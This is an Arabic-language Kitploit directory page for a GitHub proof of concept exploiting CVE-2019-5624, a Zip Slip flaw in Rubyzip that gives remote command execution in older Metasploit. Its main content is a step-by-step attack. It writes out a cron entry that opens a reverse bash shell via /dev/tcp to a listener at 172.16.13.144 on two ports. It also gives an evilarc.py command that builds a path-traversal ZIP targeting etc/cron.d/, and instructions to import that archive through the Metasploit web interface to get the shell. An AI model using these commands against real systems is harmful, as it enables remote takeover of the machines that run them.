Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-5624 — إثبات مفهوم لثغرة CVE-2019-5624 في Metasploit (معالجة ZIP غير آمنة في Rubyzip تؤدي إلى تنفيذ أوامر عن بُعد) | Kitploit
أدوات/GitHubGitHub/voidsec/cve-2019-5624
أطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubvoidsec/cve-2019-5624

CVE-2019-5624

إثبات مفهوم لثغرة CVE-2019-5624 في Metasploit (معالجة ZIP غير آمنة في Rubyzip تؤدي إلى تنفيذ أوامر عن بُعد)

عرض المستودع
1357منذ 7 سنواتلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-5624

إثبات مفهوم لثغرة CVE-2019-5624 الخاصة بـ Metasploit (معالجة ZIP غير آمنة في Rubyzip تؤدي إلى RCE)

مقدمة

في فبراير 2019، اكتشفت ثغرة جديدة في مكتبة Rubyzip. تسمح للمهاجم باستغلال معالجة ZIP غير آمنة (Zip Slip) مما يؤدي إلى تنفيذ أوامر عن بُعد.

تم استغلال هذه الثغرة لاستهداف جميع إصدارات Metasploit الأقل من 5.0.18 Metasploit Wrap-Up

لقد أعددت منشور مدونة مفصلاً يشرح الثغرة.

إثبات المفهوم

  • أنشئ ملفًا بالمحتوى التالي:
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  • أنشئ أرشيف ZIP بحمولة تجاوز المسار:
python evilarc.py exploit --os unix -p etc/cron.d/
  • أضف مساحة عمل MSF صالحة إلى ملف ZIP (لكي يقوم MSF باستخراجها، وإلا سيرفض معالجة أرشيف ZIP)
  • أعد مستمعين، واحد على المنفذ 4444 والآخر على المنفذ 4445 (الموجود على المنفذ 4445 سيحصل على الصدفة العكسية)
  • سجل الدخول في واجهة الويب الخاصة بـ MSF
  • أنشئ “مشروع” جديد
  • اختر “استيراد”، “من ملف”، اختر ملف ZIP الخبيث ثم انقر على زر “استيراد”
  • انتظر حتى تنتهي عملية الاستيراد
  • استمتع بالصدفة العكسية

فيديو

تنزيل الأداة